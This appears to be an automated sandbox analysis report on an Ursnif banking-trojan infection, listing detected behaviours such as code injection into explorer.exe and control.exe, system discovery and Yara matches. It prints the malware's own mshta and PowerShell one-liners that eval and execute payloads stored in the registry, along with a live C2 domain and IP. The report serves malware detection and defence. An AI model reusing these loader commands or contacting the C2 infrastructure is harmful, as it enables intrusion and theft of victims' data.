Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E61802 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 21_2_05E61802
Source: explorer.exe, 0000001F.00000000.1201286212.000000000A9A0000.00000004.00000001.sdmp Binary or memory string: 63}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&\
Source: explorer.exe, 0000001F.00000000.1176071944.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001F.00000000.1193929316.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: mshta.exe, 00000018.00000003.1120112463.000002024752E000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}
Source: explorer.exe, 0000001F.00000000.1176071944.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001F.00000000.1190265306.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 0000001F.00000000.1176375250.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 0000001F.00000000.1176375250.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: mshta.exe, 00000018.00000003.1120112463.000002024752E000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E51577 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 21_2_05E51577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E414A0 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 21_2_05E414A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E56E4E lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 21_2_05E56E4E

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_6FBB1A0A LoadLibraryA,GetProcAddress, 21_2_6FBB1A0A
Launches processes in debugging mode, may be used to hinder debugging
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer Jump to behavior
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E62A09 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 21_2_05E62A09

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 188.127.235.42 80 Jump to behavior
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: fum.cpp.0.dr Jump to dropped file
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.0.cs Jump to dropped file
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\control.exe base: D40000 protect: page execute and read and write Jump to behavior
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: BD4F1580 Jump to behavior
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: BD4F1580
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7076312E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: D40000 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7076312E0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 816000 Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 816000 value: 00 Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 4504 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Wfdc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wfdc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.cmdline' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDDD0.tmp' 'c:\Users\user\AppData\Local\Temp\tjafqng0\CSC6B09D7CB2D7045B59F7434F2A8CE445.TMP' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESEAC0.tmp' 'c:\Users\user\AppData\Local\Temp\qlsida3o\CSCC809748AA5EB4643A41D26B71B98A016.TMP' Jump to behavior
Source: explorer.exe, 0000001F.00000000.1185985554.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: rundll32.exe, 00000015.00000002.1191879240.0000000003660000.00000002.00020000.sdmp, powershell.exe, 00000019.00000002.1216504835.000001B6D17E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000002.1216918020.0000000001080000.00000002.00020000.sdmp, control.exe, 00000020.00000000.1177802449.0000016F932E0000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: rundll32.exe, 00000015.00000002.1191879240.0000000003660000.00000002.00020000.sdmp, powershell.exe, 00000019.00000002.1216504835.000001B6D17E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000002.1216918020.0000000001080000.00000002.00020000.sdmp, control.exe, 00000020.00000000.1177802449.0000016F932E0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000015.00000002.1191879240.0000000003660000.00000002.00020000.sdmp, powershell.exe, 00000019.00000002.1216504835.000001B6D17E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000002.1216918020.0000000001080000.00000002.00020000.sdmp, control.exe, 00000020.00000000.1177802449.0000016F932E0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: rundll32.exe, 00000015.00000002.1191879240.0000000003660000.00000002.00020000.sdmp, powershell.exe, 00000019.00000002.1216504835.000001B6D17E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000002.1216918020.0000000001080000.00000002.00020000.sdmp, control.exe, 00000020.00000000.1177802449.0000016F932E0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000001F.00000000.1176375250.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 21_2_6FBB11BF
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC6CD6 cpuid 21_2_04BC6CD6
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_6FBB10ED GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 21_2_6FBB10ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC6CD6 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 21_2_04BC6CD6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E5E3F3 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 21_2_05E5E3F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_6FBB1F7C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 21_2_6FBB1F7C

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000015.00000003.1100831932.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097126029.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097248260.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097156234.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1178938192.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097185977.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097225716.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097283225.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1222209287.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1179057406.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1178835600.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097297117.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097267626.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1105474660.000000000568C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4504, type: MEMORYSTR
Source: Yara match File source: 21.3.rundll32.exe.5838d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.578a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.58094a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.578a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000000.1176959045.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.1173339392.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1103640775.0000000005809000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.1175334626.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1221119443.0000000000C91000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.1192551182.000000000550F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1103580587.000000000578A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000015.00000003.1100831932.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097126029.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097248260.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097156234.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1178938192.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097185977.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097225716.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097283225.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1222209287.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1179057406.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1178835600.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097297117.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097267626.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1105474660.000000000568C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4504, type: MEMORYSTR
Source: Yara match File source: 21.3.rundll32.exe.5838d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.578a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.58094a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.578a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000000.1176959045.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.1173339392.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1103640775.0000000005809000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.1175334626.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1221119443.0000000000C91000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.1192551182.000000000550F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1103580587.000000000578A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp, type: MEMORY